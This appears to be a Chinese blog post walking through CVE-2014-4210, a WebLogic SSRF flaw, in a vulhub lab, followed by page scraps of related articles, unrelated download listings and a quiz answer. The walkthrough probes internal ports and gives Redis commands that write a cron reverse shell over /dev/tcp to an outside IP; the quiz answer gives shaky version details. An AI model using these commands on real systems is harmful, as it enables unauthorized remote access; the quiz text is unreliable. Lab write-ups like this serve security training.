Weblogic SSRF漏洞复现(CVE-2014-4210)【vulhub靶场】

于 2025-05-15 19:57:39 发布
阅读量405 收藏 5
点赞数 5
文章标签: web 网络安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87493916/article/details/147990940
版权

漏洞概述:

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞形成原因:

WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicRegistries.jsp 文件。该文件允许用户输入外部 URL,但未对输入的 URL 进行严格的过滤和验证,导致攻击者可以利用此功能发起任意 HTTP 请求

影响范围:

weblogic 版本10.0.2--10.3.6

复现

1,访问7001这样就是搭建成功了

2,在url处访问ip:7001/uddiexplorer/,可查看uddiexplorer应用

3,漏洞位置存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp,在表单中随意输入内容使用burp抓包,发送到重放模块

4,可以看到数据包有一个url,我们通过更改进行测试

5, 当访问一个可用端口时,会收到一个带有状态码的错误响应。如果访问的是非HTTP协议,则会返回"did not have a valid SOAP content-type"错误。

6,当访问一个不存在的端口时,响应会显示"could not connect over HTTP to server"。

7, 我们通过命令进入容器里面获取ip地址

docker exec -it 32da04e35583 /bin/bash

netstat -tuln

8,然后通过ssrf探测端口,发现了6379,存在redis未授权, 将反弹 shell 的脚本写入目录/etc/crontab(这个目录下是一个默认自动执行的一些 crontab 定时服务命令,里面都写的是一些开启服务的命令)

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/192.168.43.133/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

Time?
关注
Weblogic SSRF漏洞CVE-2014-4210
weixin_39664643的博客
01-25 1251
利用范围 版本10.0.2,10.3.6 原理 Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。 利用 漏洞靶场 编译及启动测试环境 docker-compose build docker-compose up -d 访问http
weblogic漏洞复现
cgygsw的博客
03-31 89
save。
Weblogic漏洞复现SSRFCVE-2014-4210
hhsjjsj的博客
08-06 1960
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件。
Weblogic SSRFCVE-2014-4210
Long___Xiao的博客
02-26 848
这种攻击方式通常针对从外网无法访问的内部系统,因为是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统。然而,需要注意的是,DICT协议不支持换行符,无法进行换行,因此不适合用于攻击那些需要交互的应用(如需要认证的Redis)。SSRF漏洞通过篡改获取资源的请求发送给服务器(服务器并没有检测这个请求是否合法的),然后服务器以他的身份来访问服务器的其他资源。开放的端口和非开放的端口在响应时间上是不同的,因此攻击者可以通过FTP协议来收集这些信息。这里为了方便直接查看靶场的redis的IP和端口。
漏洞复现CVE-2014-4210(Weblogic ssrf)
deginner2的博客
07-28 1296
Weblogic 漏洞复现
[Vulhub] Weblogic SSRF 漏洞CVE-2014-4210
weixin_45605352的博客
07-21 7185
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
SSRF漏洞(CVE-2014-4210)
weixin_69783474的博客
02-10 200
将该payload进行url编码 ( ip是kali的IP 7777是自己在kali上设置的端口)开启Centos7-->打开vulhub-master-->进入weblogic-->ssrf。将operator参数中的url修改为redies对应服务器的端口。查看正在运行的容器,看到了redies服务(6379)对应的端口。利用抓包软件进行抓包(在框中输入内容-->search)将编码好的payload写入刚才的operator后面。Send之后就看到了已经监听上了。从回应包中看到了接收到了url。
SSRF 漏洞CVE-2014-4210)】
cyyyyy123的博客
03-07 1118
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造请求,从而让服务端发起请求的一种安全漏洞。它将一个可以发起网络请求的服务当作跳板来攻击其他内部服务。SSRF的攻击目标一般是与外部隔离的内网资源。
WebLogic-Redis:CVE-2014-4210[SSRF]
h1008685的博客
07-30 419
环境部署:开启靶场,查看端口,获取redis内网ip,访问漏洞发生页 漏洞利用:开启代理,bp抓包,替换参数测试端口,编写payload,url编码,编码内容替换,监听指定端口,发送数据包反弹连接
红日靶场2
weixin_48169878的博客
07-10 5071
1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0设置一个lan区段,所有主机都加入到这个lan区段结果如下:3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是
西域大都护府 第四期cfs靶场 渗透记录
ShenZ的博客
02-14 2170
西域大都护府 第四期cfs靶场 渗透记录1.DEDECMS2.二层探测+转发2.1 tomcat2.2 shiro2.3 weblogic3.第三层 官方wp: https://mp.weixin.qq.com/s/SGiEnT28JyAuWK9DC4T4-w 内网拓扑图 1.DEDECMS 首先是dedecms,会员功能被关闭了,那个前台的登陆口没法用 ps.dedecms一些漏洞 文件上传的payload:https://zhzhdoai.github.io/2019/07/28/Dedec
SSRF漏洞(服务器端请求伪造)
赤赤三的博客
03-21 2293
中间人(SSRF就是中间人)攻击,服务端请求伪造,主要攻击内网,打redis和weblogic特别厉害,目标网站的内部系统(他是从内部系统访问的,所以通过它攻击外部系统无法访问的内部系统,也就是目标网站当成中间人)。 大部分漏漏洞都是参数给变量的时候没有做任何限制导致漏洞。 攻击主要结果: 写webshell(需要知道web路径,有增删改查权限,gopher协议的使用,使用工具生成gopher 攻击ssrfpayload) 反弹shell(获取操作系统命令) 原理: 根本原因: SS.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
hi-z测试文件遮挡剔除
最新发布
05-16
hi-z测试文件遮挡剔除
毕业设计-喝酒-整站商业源码.zip
05-16
毕业设计-喝酒-整站商业源码.zip
生成对抗网络在计算机视觉领域的应用.pdf
05-16
生成对抗网络在计算机视觉领域的应用.pdf
光学仿真领域COMSOL远场偏振通用计算方法及Matlab辅助分析
05-16
内容概要:本文详细介绍了COMSOL在远场偏振通用计算中的应用,涵盖从建模到仿真的完整流程。首先解释了远场偏振的概念及其在光学模拟中的重要性,接着逐步讲解了如何在COMSOL中建立光学模型、划分网格、设置参数并运行仿真。随后,重点讨论了如何解读远场偏振图和能带结构图,最后介绍了如何使用Matlab程序读取COMSOL输出数据并进行进一步的分析和绘图。通过这些步骤,读者可以全面掌握COMSOL在远场偏振计算中的应用。 适合人群:从事光学仿真领域的研究人员和技术人员,尤其是那些希望深入了解COMSOL软件及其与Matlab集成使用的专业人士。 使用场景及目标:适用于需要进行复杂光学仿真和数据分析的研究项目,旨在提高对光波传播行为和材料特性的理解,促进相关领域的科研创新。 阅读建议:建议读者跟随文中提供的具体步骤进行实际操作练习,同时结合Matlab代码示例加深理解。对于初学者来说,可以从简单模型入手,逐渐过渡到更复杂的仿真任务。
07-组成原理1.3选择6-10.sz
05-16
07-组成原理1.3选择6-10.sz
关于Weblogic SSRF漏洞CVE-2014-4210)说法正确的是 (2分) A 通过返回数据包中的错误信息,即可探测内网状态 B 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞 C 实战中可以通过爆破,从返回数据包的长度来判断开放了哪些端口,再根据开放的端口深入利用 D 影响版本为:10.0.2.0,10.3.6.0,12.2.1.2
06-08
关于Weblogic SSRF漏洞CVE-2014-4210),正确的说法是B 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞,D 影响版本为:10.0.2.0,10.3.6.0,12.1.3.0.0,12.2.1.0.0,12.2.1.1.0。 CVE-2014-4210Weblogic Server的一种SSRF漏洞,攻击者可以通过构造恶意请求,利用此漏洞访问内部网络资源,可能导致敏感信息泄露、系统崩溃等风险。 关于这个漏洞,正确的说法是: A. 通过返回数据包中的错误信息,可能可以探测内网状态,但并不是一定可以探测。 B. 访问/uddiexplorer/SearchPublicRegistries.jsp,若能正常访问,则可能存在此漏洞,这个页面是Weblogic Server中的一个测试页面,可以用来测试UDDI的功能。 C. 实战中可以通过爆破,从返回数据包的长度来判断开放了哪些端口,再根据开放的端口深入利用,这个说法并不正确,因为端口长度并不一定和端口号对应,而且也不一定能够得到正确的结果。 D. 影响版本包括10.0.2.0,10.3.6.0,12.1.3.0.0,12.2.1.0.0,12.2.1.1.0等版本。 因此,选项B和D是正确的说法。 答案:B、D。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值